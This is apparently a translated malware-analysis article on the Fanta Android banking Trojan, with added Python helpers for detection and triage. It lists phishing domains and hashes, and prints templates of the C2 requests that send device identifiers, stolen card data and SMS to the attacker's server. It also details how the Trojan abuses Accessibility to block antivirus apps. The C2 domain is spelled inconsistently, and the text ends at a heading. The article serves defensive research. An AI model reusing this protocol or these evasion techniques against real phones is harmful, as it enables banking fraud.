Leysya, Fanta: a new tactic for an old Android Trojan

One day you decide to sell something on Avito and, having posted a detailed description of your item (say, a RAM module), you receive this message:

When you open the link, you see a seemingly harmless page informing you, the happy and successful seller, that the purchase has been completed:

When you press the "Continue" button, an APK file with a trustworthy icon and name is downloaded to your Android device. You install an application that, for some reason, requests AccessibilityService permissions; then a couple of windows appear and quickly disappear, and... that's it.

You go to check your balance, but for some reason your banking app asks for your card details again. After you enter them, something terrible happens: for a reason that is still unclear to you, money starts disappearing from your account. You try to fix the problem, but your phone fights back: it presses the "Back" and "Home" keys by itself, will not turn off, and will not let you enable any security measures. As a result, you are left without money, your item has not been sold, and you are confused and wondering: what just happened?

The answer is simple: you have become a victim of the Android Trojan Fanta, a member of the Flexnet family. How did this happen? Let us explain.

Authors: Andrey Polovinkin, junior malware analysis specialist, and Ivan Pisarev, malware analysis specialist.

Some statistics

The Flexnet family of Android Trojans first became known back in 2015. Over its long period of activity, the family has branched into several subspecies: Fanta, Limebot, Lipton, and others. The Trojan, and the infrastructure associated with it, does not stand still: new effective distribution schemes are being developed (in our case, high-quality phishing pages aimed at a specific seller), and the Trojan's developers follow current trends in malware writing, adding new functionality that lets them steal money from infected devices more effectively and bypass protection mechanisms.

The campaign described in this article targets users from Russia; a small number of infected devices were recorded in Ukraine, and even fewer in Kazakhstan and Belarus.

Although Flexnet has been in the Android Trojan arena for more than 4 years now and has been studied in detail by many researchers, it is still in good shape. Since January 2019, the potential damage has exceeded 35 million rubles, and that is only for campaigns in Russia. In 2015, various versions of this Android Trojan were sold on underground forums, where the Trojan's source code with a detailed description could also be found. This means that the damage statistics worldwide are even more impressive. Not a bad track record for such an old-timer, is it?

From sale to fraud

As can be seen from the screenshot above of the phishing page for the Avito online classifieds service, it was prepared for a specific victim. Apparently, the attackers use one of the Avito parsers, which extracts the seller's phone number and name along with the description of the item. After the page is generated and the APK file is prepared, the victim is sent an SMS with their name and a link to the phishing page, which contains the description of their item and the amount received from the "sale". By clicking the button, the user receives the malicious APK file, Fanta.

Investigation of the domain shcet491[.]ru showed that it is delegated to Hostinger's DNS servers:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

The domain zone file contains records pointing to the IP addresses 31.220.23[.]236, 31.220.23[.]243 and 31.220.23[.]235. However, the main domain record (the A record) points to the server with IP address 178.132.1[.]240.

The IP address 178.132.1[.]240 is located in the Netherlands and belongs to the hoster WorldStream. The IP addresses 31.220.23[.]235, 31.220.23[.]236 and 31.220.23[.]243 are located in the UK and belong to a HOSTINGER shared hosting server. The registrar used is openprov-ru. The following domains also resolved to the IP address 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

It should be noted that links of the following format were available on almost every one of these domains:

http://(www.){0,1}<%domain%>/[0-9]{7}

The link from the SMS message also matches this pattern. Based on historical data, it was found that one domain corresponds to several links of the pattern described above, which indicates that a single domain was used to distribute the Trojan to several victims.

Let us jump ahead a little: the Trojan downloaded from the link in the SMS uses the address onusedseddohap[.]club as its control server. This domain was registered on 2019-03-12, and from 2019-04-29 onward APK applications interacted with it. According to data obtained from VirusTotal, a total of 109 applications interacted with this server. The domain itself resolved to the IP address 217.23.14[.]27, located in the Netherlands and owned by the hoster WorldStream. The registrar is recorded in the domain registration data. The domains bad-racoon[.]club (since 2018-09-25) and bad-racoon[.]live (since 2018-10-25) also resolved to this IP address. More than 80 APK files were associated with the domain bad-racoon[.]club, and more than 100 with bad-racoon[.]live.
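As an added example (not code from the Group-IB article), the following Python scans SMS text for links that match the distribution pattern http://(www.){0,1}<%domain%>/[0-9]{7} quoted above, using the defanged domain list from this section. The sample messages are constructed, and the trailing negative lookahead encodes our assumption that the path is exactly seven digits.

```python
import re

# Defanged distribution domains from this section of the article.
DEFANGED_DOMAINS = [
    "shcet491[.]ru", "sdelka-ru[.]ru", "tovar-av[.]ru", "av-tovar[.]ru",
    "ru-sdelka[.]ru", "shcet382[.]ru", "sdelka221[.]ru", "sdelka211[.]ru",
    "vyplata437[.]ru", "viplata291[.]ru", "perevod273[.]ru", "perevod901[.]ru",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('a[.]b', 'hXXp://') back into its live form."""
    return indicator.replace("[.]", ".").replace("hXXp://", "http://")


def build_link_pattern(domains):
    """Compile the distribution-link pattern http://(www.){0,1}<domain>/[0-9]{7}
    for every known domain. Domains are escaped so their dots are literal; the
    trailing (?!\\d) is our assumption that the path is exactly seven digits."""
    alternation = "|".join(re.escape(refang(d)) for d in domains)
    return re.compile(r"http://(?:www\.)?(" + alternation + r")/(\d{7})(?!\d)")


LINK_RE = build_link_pattern(DEFANGED_DOMAINS)


def find_fanta_links(text: str) -> list:
    """Return (domain, seven_digit_id) pairs for every distribution link in text."""
    return [(m.group(1), m.group(2)) for m in LINK_RE.finditer(text)]


def scan_messages(messages) -> dict:
    """Map each message index to the links it contains (an empty list means clean)."""
    return {i: find_fanta_links(msg) for i, msg in enumerate(messages)}


# Constructed SMS texts for the demo, not real victim messages.
SAMPLE_SMS = [
    "Ivan, your item has been paid for. Details: http://shcet491.ru/1234567",
    "Payment received! http://www.perevod273.ru/7654321",
    "Your parcel http://example.org/1234567 has been delivered",
    "Look at http://shcet491.ru/12345678 today",
]

if __name__ == "__main__":
    for i, links in scan_messages(SAMPLE_SMS).items():
        print(i, "FANTA LINK" if links else "clean", links)
```

Run as a script it labels each constructed message; the same find_fanta_links can be run over an SMS export or web-proxy log. The fourth sample shows why the exact-length check matters: an eight-digit path does not match.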

In general, the attack proceeds as follows (the attack scheme diagram is in the original article).

What is under Fanta's hood?

Like many other Android Trojans, Fanta can read and send SMS messages, make USSD requests, and display its own windows on top of applications (including banking ones). However, the family's arsenal of functionality has grown: Fanta has started using AccessibilityService for several purposes, such as reading the contents of notifications from other applications, preventing detection, and stopping the Trojan from being terminated on the infected device. Fanta runs on all Android versions from 4.4 upward. In this article we take a closer look at the following Fanta sample:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediately after launch

Immediately after launch, the Trojan hides its icon. The application only runs if the name of the infected device is not in the following list:

  • android_x86
  • Virtualbox
  • Nexus 5X (bullhead)
  • Nexus 5 (hammerhead)

This check is performed in the Trojan's main service, MainService. At first launch, the application's configuration parameters are initialized with default values (the storage format of the configuration data and its meaning are discussed later), and the new infected device is registered on the control server. An HTTP POST request with the mode register_bot and information about the infected device (Android version, IMEI, phone number, operator name and the code of the country in which the operator is registered) is sent to the server. The address hXXp://onuseseddohap[.]club/controller.php serves as the control server. In response, the server sends a message containing the fields bot_id, bot_pwd and server; the application saves these values as the CnC server parameters. The server parameter is optional: if the field is not received, Fanta uses the registration address hXXp://onuseseddohap[.]club/controller.php. The ability to change the CnC address can serve two purposes: to distribute the load evenly between several servers (with a large number of infected devices, the load on an unoptimized web server can be high), and to use an alternative server if one of the CnC servers fails.

If an error occurs while sending the request, the Trojan repeats the registration procedure after 20 seconds.

When the device has been registered successfully, Fanta shows the user the following message (screenshot in the original article).

An important point: the service called Security is the Trojan's service, and after the OK button is clicked, a window with the Accessibility settings of the infected device opens, where the user is expected to grant Accessibility permissions to the malicious service.

When the user enables the AccessibilityService, Fanta gains access to the contents of application windows and to the actions performed in them.

Immediately after receiving Accessibility rights, the Trojan requests device administrator rights and the right to read notifications.

Using AccessibilityService, the application simulates keystrokes, thereby granting itself all the necessary rights.

Fanta creates several databases (described later) to store the configuration data as well as the information collected about the infected device. To send the collected information, the Trojan creates a recurring task that reads fields from the database and receives commands from the control server. The interval for contacting the CnC depends on the Android version: on 5.1 the interval is 10 seconds, otherwise 60 seconds.

To receive commands, Fanta sends a getTask request to the control server. In response, the CnC can send one of the following commands:

  Command  Description
  0        Send an SMS message
  1        Make a phone call or execute a USSD command
  2        Update the interval parameter
  3        Update the intercept parameter
  6        Update the smsManager parameter
  9        Start collecting SMS messages
  11       Reset the phone to factory settings
  12       Enable/disable logging of dialog box creation

Fanta also collects notifications from 70 banking apps, fast payment systems and e-wallets and stores them in the database.

Storing configuration parameters

To store configuration parameters, Fanta uses the approach that is standard for the Android platform: Preferences files. The settings are saved in a file named settings. The stored parameters are described below (name, default value, possible values, purpose):

  • id (default: 0; Integer): bot ID
  • server (default: hXXp://onuseseddohap[.]club/; URL): control server address
  • pwd (default: none; String): server password
  • interval (default: 20; Integer): timeout interval; indicates how long the following tasks should be delayed:
    · sending a request about the status of a sent SMS
    · receiving a new command from the control server
  • intercept (default: all; all/telNumber): if the field equals the string all or a phone number, the received SMS message is intercepted by the application and not shown to the user
  • smsManager (default: 0; 0/1): enable/disable the application as the default SMS handler
  • readDialog (default: false; true/false): enable/disable logging of AccessibilityEvent events

Fanta also uses the file smsManager:

  • pckg (default: none; String): name of the SMS manager being used
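As an added example (not code from the article), this Python parses a SharedPreferences XML file recovered from an infected device and compares it with the defaults in the table above, so an analyst can see at a glance whether the bot registered, whether the C2 address was overridden during registration, and what SMS interception scope was set. It assumes the preference keys equal the parameter names listed above and that the empty default for pwd is an empty string; the sample file is constructed.

```python
import xml.etree.ElementTree as ET

# Defaults from the article's parameter table. Assumptions: the preference
# keys equal the parameter names, the empty default for pwd is "", and the
# defanged default server URL is written here in its live form.
DEFAULTS = {
    "id": 0,
    "server": "http://onuseseddohap.club/",
    "pwd": "",
    "interval": 20,
    "intercept": "all",
    "smsManager": 0,
    "readDialog": False,
}


def parse_shared_prefs(xml_text: str) -> dict:
    """Parse an Android SharedPreferences XML document (a <map> of typed
    <int>/<long>/<float>/<boolean>/<string> elements) into Python values."""
    root = ET.fromstring(xml_text)
    values = {}
    for el in root:
        name = el.get("name")
        if el.tag == "string":
            values[name] = el.text or ""
        elif el.tag in ("int", "long"):
            values[name] = int(el.get("value"))
        elif el.tag == "float":
            values[name] = float(el.get("value"))
        elif el.tag == "boolean":
            values[name] = el.get("value") == "true"
    return values


def fanta_config(xml_text: str) -> dict:
    """Merge the recovered settings with the table defaults and summarise the
    state an analyst cares about: registered?, C2 overridden?, SMS interception
    scope, default-SMS-app takeover, dialog logging."""
    recovered = parse_shared_prefs(xml_text)
    merged = dict(DEFAULTS)
    merged.update({k: v for k, v in recovered.items() if k in DEFAULTS})
    changed = {k: v for k, v in merged.items() if v != DEFAULTS[k]}
    return {
        "settings": merged,
        "changed_from_default": changed,
        # the article: a bot_id of 0 means registration never succeeded
        "registered": merged["id"] != 0,
        "c2_overridden": merged["server"] != DEFAULTS["server"],
        "intercept_scope": "all SMS" if merged["intercept"] == "all"
                           else f"only {merged['intercept']}",
        "default_sms_app": bool(merged["smsManager"]),
        "dialog_logging": merged["readDialog"],
    }


# Constructed sample of shared_prefs/settings.xml (not a real capture).
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <int name="id" value="1042" />
    <string name="server">http://second-cnc.example/controller.php</string>
    <string name="pwd">s3cret</string>
    <string name="intercept">+70000000000</string>
    <int name="interval" value="20" />
    <int name="smsManager" value="1" />
    <boolean name="readDialog" value="true" />
</map>"""

if __name__ == "__main__":
    for key, value in fanta_config(SAMPLE_PREFS).items():
        print(f"{key}: {value}")
```

The changed_from_default view is the quickest way to spot a secondary C2 handed out at registration, which the article notes is exactly what the server field is for.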

Interaction with databases

During its operation, the Trojan uses two databases. The database named a is used to store various data collected from the phone. The second database is named fanta.db and stores the settings that control the creation of the phishing windows designed to collect bank card information.

The Trojan uses the database а to store the collected data and to log its actions. The data is stored in the logs table, which is created with the following SQL query:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

The database contains the following information:

1. A record of the infected device starting up, with the message Phone turned on!

2. Notifications from applications. The message is generated according to the following template:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bank card data from the phishing forms created by the Trojan. The VIEW_NAME parameter may be one of the following:

  • AliExpress
  • Avito
  • Google Play
  • Other <%App Name%>

The message is logged in the format:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Incoming/outgoing SMS messages, in the format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Information about the package that created the dialog box, in the format:

(<%Package name%>)<%Package information%>

Example of the logs table (screenshot in the original article).
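The five record templates above can be told apart mechanically, which is what an analyst needs when triaging a logs table pulled from an infected device. As an added example (not the article's or Group-IB's code), the following Python recreates the logs table in an in-memory SQLite database using the CREATE TABLE statement quoted above, fills it with constructed rows, classifies each d value by template, and masks the card number in the output. The "Phone turned on!" string is our English rendering of the startup message, the f column is left empty because the article does not describe it, and notification and dialog records can only be distinguished heuristically because their templates overlap.

```python
import re
import sqlite3

# DDL quoted in the article.
LOGS_DDL = ("create table logs ( _id integer primary key autoincrement, "
            "d TEXT, f TEXT, p TEXT, m integer)")

# Assumed English rendering of the startup message; the real string differs.
BOOT_MESSAGE = "Phone turned on!"

TS = r"\[(\d{2}:\d{2}:\d{2} \d{2}\.\d{2}\.\d{4})\]"
CARD_RE = re.compile(TS + r"\((?P<view>[^)]*)\) Номер карты:(?P<pan>[^;]*); "
                     r"Дата:(?P<month>[^/]*)/(?P<year>[^;]*); CVV: ?(?P<cvv>.*)", re.S)
SMS_RE = re.compile(r"\(" + TS + r" Тип: (?P<dir>Входящее|Исходящее)\) "
                    r"(?P<number>[^:]*):(?P<text>.*)", re.S)
NOTIF_RE = re.compile(r"\((?P<app>[^)]*)\)(?P<title>[^:]*): (?P<text>.*)", re.S)
PKG_RE = re.compile(r"\((?P<pkg>[^)]*)\)(?P<info>.*)", re.S)


def mask_pan(pan: str) -> str:
    """Keep only the last four digits of a card number in analyst output."""
    digits = re.sub(r"\D", "", pan)
    return "*" * max(len(digits) - 4, 0) + digits[-4:]


def classify(d: str) -> dict:
    """Classify one logs.d value by the templates described in the article.
    Card and SMS records carry unambiguous markers and are tested first;
    notification vs. dialog records are separated by the 'Title: text' shape."""
    m = CARD_RE.match(d)
    if m:
        return {"kind": "card", "time": m.group(1), "view": m.group("view"),
                "pan": mask_pan(m.group("pan")),
                "exp": f"{m.group('month')}/{m.group('year')}"}
    m = SMS_RE.match(d)
    if m:
        return {"kind": "sms", "time": m.group(1),
                "direction": "in" if m.group("dir") == "Входящее" else "out",
                "number": m.group("number"), "text": m.group("text")}
    if d.strip() == BOOT_MESSAGE:
        return {"kind": "boot"}
    m = NOTIF_RE.match(d)
    if m:
        return {"kind": "notification", "app": m.group("app"),
                "title": m.group("title"), "text": m.group("text")}
    m = PKG_RE.match(d)
    if m:
        return {"kind": "dialog", "package": m.group("pkg"), "info": m.group("info")}
    return {"kind": "unknown", "raw": d}


# Constructed rows (d, f, p, m); none are real victim data.
SAMPLE_ROWS = [
    ("Phone turned on!", "", "", 0),
    ("(Bank App)Code: Your code is 1234", "", "", 0),
    ("[12:00:05 01.05.2019](Avito) Номер карты:4111 1111 1111 1111; Дата:12/22; CVV: 123", "", "", 0),
    ("([12:01:00 01.05.2019] Тип: Входящее) +70000000000:Test message", "", "+70000000000", 1),
    ("(com.example.settings)Settings dialog", "", "", 0),
]


def load_sample_db() -> sqlite3.Connection:
    """Create the logs table exactly as the Trojan does and insert the sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute(LOGS_DDL)
    con.executemany("insert into logs (d, f, p, m) values (?, ?, ?, ?)", SAMPLE_ROWS)
    return con


def triage(con: sqlite3.Connection) -> list:
    """Classify every row of the logs table, keeping its _id for cross-reference."""
    return [dict(classify(d), rowid=_id)
            for _id, d in con.execute("select _id, d from logs order by _id")]


def summary(records: list) -> dict:
    """Count records per kind, e.g. how many card captures a device logged."""
    counts = {}
    for r in records:
        counts[r["kind"]] = counts.get(r["kind"], 0) + 1
    return counts


if __name__ == "__main__":
    recs = triage(load_sample_db())
    for r in recs:
        print(r)
    print(summary(recs))
```

Against a real database file, replace ":memory:" with the path of the recovered а database and drop the DDL and insert steps; the triage and summary functions are unchanged.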
One of Fanta's functions is collecting bank card information. The data is collected by creating phishing windows when banking applications are opened. The Trojan creates a given phishing window only once. Information about whether the window has already been shown to the user is stored in the settings table in the fanta.db database, created with the following SQL query:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All table fields are initialized to 1 by default (create the phishing window). After the user enters their data, the value is set to 0. Examples of the table fields:

  • can_login - the field controls whether the form is shown when a banking application is opened
  • first_bank - not used
  • can_avito - the field controls whether the form is shown when the Avito application is opened
  • can_ali - the field controls whether the form is shown when the Aliexpress application is opened
  • can_another - the field controls whether the form is shown when an application from the following list is opened: Yula, Pandao, Drom Auto, Wallet. Discounts and bonus cards, Aviasales, Booking, Trivago
  • can_card - the field controls whether the form is shown when Google Play is opened

Interaction with the control server

Network interaction with the control server takes place over HTTP. To work with the network, Fanta uses the popular Retrofit library. Requests are sent to hXXp://onuseseddohap[.]club/controller.php. The server address can be changed during registration on the server. Cookies can be sent by the server. Fanta makes the following requests to the server:

  • Registration of the bot on the control server happens once, at first launch. The following data about the infected device is sent to the server:
    · cookie - cookie received from the server (default value is an empty string)
    · mode - string constant register_bot
    · prefix - integer constant 2
    · version_sdk - formed according to the following template: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI of the infected device
    · country - code of the country in which the operator is registered, in ISO format
    · number - phone number
    · operator - operator name

    An example of the request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
    

    In response to the request, the server must send a JSON object containing the following parameters:
    · bot_id - ID of the infected device. If bot_id equals 0, Fanta repeats the request.
    · bot_pwd - password for the server.
    · server - control server address. Optional parameter. If the parameter is not specified, the address stored in the application is used.

    Example JSON object:

    {
        "response":[
       	 {
       		 "bot_id": <%BOT_ID%>,
       		 "bot_pwd": <%BOT_PWD%>,
       		 "server": <%SERVER%>
       	 }
        ],
        "status":"ok"
    }

  • Request to receive commands from the server. The following data is sent to the server:
    · cookie - cookie received from the server
    · bid - ID of the infected device, received in response to the register_bot request
    · pwd - password for the server
    · divice_admin - field indicating whether device administrator rights have been obtained. If administrator rights have been obtained, the field equals 1, otherwise 0
    · Accessibility - AccessibilityService status. If the service has been started, the value is 1, otherwise 0
    · SMSManager - indicates whether the Trojan is enabled as the default SMS application
    · screen - indicates the state of the screen. The value is 1 if the screen is on, otherwise 0

    An example of the request sent to the server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Depending on the command, the server can return a JSON object with different parameters:

    · Send an SMS message command: the parameters contain the phone number, the text of the SMS and the ID of the message being sent. The identifier is used when sending a message to the server with the setSmsStatus mode.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": <%SMS_NUMBER%>,
       		 "sms_text": <%SMS_TEXT%>,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Make a phone call or execute a USSD command: the phone number or the command comes in the response body.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": <%TEL_NUMBER%>
       	 }
        ],
        "status":"ok"
    }

    · Change the interval parameter command.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": <%SECONDS%>
       	 }
        ],
        "status":"ok"
    }

    · Change the intercept parameter command.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
       	 }
        ],
        "status":"ok"
    }

    · Change the SmsManager field command.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Collect SMS messages from the infected device command.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Reset the phone to factory settings command:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Change the ReadDialog parameter command.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • Sending a message with the setSmsStatus mode. This request is made after the Send an SMS message command has been executed. The request looks like this:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Uploading the database contents. One row is transmitted per request. The following data is sent to the server:
    · cookie - cookie received from the server
    · mode - string constant setSaveInboxSms
    · bid - ID of the infected device, received in response to the register_bot request
    · text - text of the current database record (field d of the logs table in database а)
    · number - name of the current database record (field p of the logs table in database а)
    · sms_mode - integer value (field m of the logs table in database а)

    The request looks like this:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    If the upload to the server succeeds, the row is deleted from the table. Example of the JSON object returned by the server:

    {
        "response":[],
        "status":"ok"
    }
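Pulling the requests above together, here is an added Python example (not the article's code) that decodes the form-encoded request bodies and the JSON replies the way an analyst would when reviewing captured proxy traffic: it recognises the four mode values, maps getTask command codes to names using the command table, and applies the article's rule that a bot_id of 0 means registration did not succeed. The request bodies and responses are constructed with obviously fake values.

```python
import json
from urllib.parse import parse_qs

# Command codes from the getTask table in the article.
COMMANDS = {
    0: "send_sms", 1: "call_or_ussd", 2: "set_interval", 3: "set_intercept",
    6: "set_sms_manager", 9: "collect_sms", 11: "factory_reset", 12: "set_read_dialog",
}

# The four request modes described in the article.
KNOWN_MODES = {"register_bot", "getTask", "setSmsStatus", "setSaveInboxSms"}


def parse_request(body: str) -> dict:
    """Decode the x-www-form-urlencoded body of a controller.php POST into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def is_fanta_request(body: str) -> bool:
    """True when the body carries one of the Trojan's known mode values."""
    return parse_request(body).get("mode") in KNOWN_MODES


def decode_tasks(response_text: str) -> list:
    """Turn a getTask JSON reply into (command_name, details) tuples.
    Unknown codes are kept, labelled unknown_<code>, rather than dropped."""
    doc = json.loads(response_text)
    if doc.get("status") != "ok":
        return []
    tasks = []
    for item in doc.get("response", []):
        mode = item.get("mode")
        name = COMMANDS.get(mode, f"unknown_{mode}")
        details = {k: v for k, v in item.items() if k != "mode"}
        tasks.append((name, details))
    return tasks


def registration_ok(response_text: str) -> bool:
    """A register_bot reply with bot_id 0 makes the bot retry; treat it as not registered."""
    doc = json.loads(response_text)
    first = (doc.get("response") or [{}])[0]
    return doc.get("status") == "ok" and int(first.get("bot_id", 0)) != 0


# Constructed samples with placeholder values filled in (not real captures).
SAMPLE_REGISTER_BODY = (
    "mode=register_bot&prefix=2&version_sdk=Nexus%205%2F5.1(Avit)"
    "&imei=000000000000000&country=ru&number=%2B70000000000&operator=TestOp"
)
SAMPLE_GETTASK_BODY = ("mode=getTask&bid=1042&pwd=s3cret&divice_admin=1"
                       "&Accessibility=1&SMSManager=0&screen=1")
SAMPLE_REGISTER_RESPONSE = json.dumps({
    "response": [{"bot_id": 1042, "bot_pwd": "s3cret",
                  "server": "http://cnc.example/controller.php"}],
    "status": "ok",
})
SAMPLE_TASK_RESPONSE = json.dumps({
    "response": [
        {"mode": 0, "sms_number": "+70000000001", "sms_text": "hi", "sms_id": 7},
        {"mode": 3, "intercept": "all"},
        {"mode": 11},
    ],
    "status": "ok",
})

if __name__ == "__main__":
    print(parse_request(SAMPLE_REGISTER_BODY))
    print("registered:", registration_ok(SAMPLE_REGISTER_RESPONSE))
    for name, details in decode_tasks(SAMPLE_TASK_RESPONSE):
        print(name, details)
```

In a proxy or IDS pipeline, is_fanta_request on the POST body is a cheap first filter, and decode_tasks on the reply shows immediately whether a factory reset or SMS interception change was pushed to the device.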

Interaction with AccessibilityService

AccessibilityService is designed to make Android devices easier to use for people with disabilities. Most often, physical interaction with the device is required to operate an application; AccessibilityService allows those actions to be performed programmatically. Fanta uses the service to create fake windows in banking applications and to prevent the user from opening the system settings and certain applications.

Using the capabilities of AccessibilityService, the Trojan monitors changes to the contents of the infected device's screen. As described earlier, Fanta's settings contain a parameter that controls logging of dialog box operations: readDialog. If this parameter is set, information about the name and description of the package that triggered the event is added to the database. The Trojan performs the following actions when events occur:

  • Simulates pressing the Back and Home keys in the following cases:
    · if the user tries to reboot the device
    · if the user tries to uninstall the "Avito" application or change its access rights
    · if the "Avito" application is mentioned on the page
    · when the Google Play Protect application is opened
    · when pages with AccessibilityService settings are opened
    · when the System Security dialog box appears
    · when the page with the "Draw over other apps" setting is opened
    · when the pages "Applications", "Recovery and reset", "Data reset", "Reset settings", "Developer panel", "Special features", "Special rights" are opened
    · if the event was generated by one of the applications listed below.

    Applications:

    • In the phone
    • Master Lite
    • Clean Master
    • Clean Master for x86 CPU
    • Meizu Application Permission Management
    • MIUI Security
    • Clean Master - Antivirus & Cache and Garbage Cleaner
    • Parental control and GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & free protection 2019
    • Mobile Security MegaFon
    • AVG protection for Xperia
    • Mobile Security
    • Malwarebytes Antivirus & Protection
    • Antivirus for Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • AVG antivirus for Huawei tablet System Manager
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • Dr. Web
    • Dr.Web Security Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Bank
    • Kaspersky Internet Security: Antivirus and Protection
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - protection and management
    • AVG Antivirus free 2019 - Protection for Android
    • Antivirus
    • Norton Mobile Security and Antivirus
    • Antivirus, firewall, VPN, mobile security
    • Mobile Security: antivirus, VPN, theft protection
    • Antivirus for Android

  • If a permission prompt appears when sending an SMS to a short number, Fanta simulates clicking the Remember choice checkbox and the Send button.
  • When an attempt is made to revoke the Trojan's administrator rights, it locks the phone screen.
  • Prevents new device administrators from being added.
  • If the Dr.Web antivirus application detects a threat, Fanta imitates pressing the Ignore button.
  • The Trojan simulates pressing the Back and Home buttons if the event was generated by the Samsung Device Care application.
  • Fanta creates phishing windows with forms for entering bank card information if an application from a list of about 30 different Internet services is launched. Among them: AliExpress, Booking, Avito, the Google Play Market component, Pandao, Drom Auto, and others.
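A defender-side check for the abuse described in this section: Android stores the list of enabled accessibility services in the secure setting enabled_accessibility_services as colon-separated package/ServiceClass component names, readable with `adb shell settings get secure enabled_accessibility_services`. The added Python below (not code from the article) parses that value and flags any service outside an allowlist, which catches a service like the one the Trojan tricks the user into enabling even when it hides the settings page from the device's own screen. The allowlist, the sample value and the package name com.fake.avitoapp are constructed.

```python
import subprocess

# Constructed allowlist of services expected on a managed device; extend per fleet.
KNOWN_ACCESSIBILITY_SERVICES = {
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService",
}


def parse_enabled_services(raw: str) -> list:
    """Parse the value of the enabled_accessibility_services secure setting:
    a colon-separated list of package/ServiceClass names, or 'null' when unset."""
    raw = raw.strip()
    if raw in ("", "null"):
        return []
    return [s for s in raw.split(":") if s]


def suspicious_services(raw: str, allowlist=KNOWN_ACCESSIBILITY_SERVICES) -> list:
    """Return enabled services that are not on the allowlist, with their package names,
    so the package can be pulled for analysis or removed."""
    flagged = []
    for comp in parse_enabled_services(raw):
        if comp in allowlist:
            continue
        flagged.append({"component": comp, "package": comp.split("/", 1)[0]})
    return flagged


def read_from_device(adb: str = "adb") -> str:
    """Read the live value over adb (needs a connected device with USB debugging on)."""
    result = subprocess.run(
        [adb, "shell", "settings", "get", "secure", "enabled_accessibility_services"],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


# Constructed sample value: TalkBack plus a look-alike service named after the
# Trojan's MainService under a placeholder package.
SAMPLE_SETTING = (
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:"
    "com.fake.avitoapp/com.fake.avitoapp.MainService"
)

if __name__ == "__main__":
    for hit in suspicious_services(SAMPLE_SETTING):
        print("unexpected accessibility service:", hit["component"])
```

On a device that cannot be inspected through its own settings UI (as the article describes), running this over adb is one way to confirm which service holds Accessibility access before deciding on removal.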

    Phishing forms

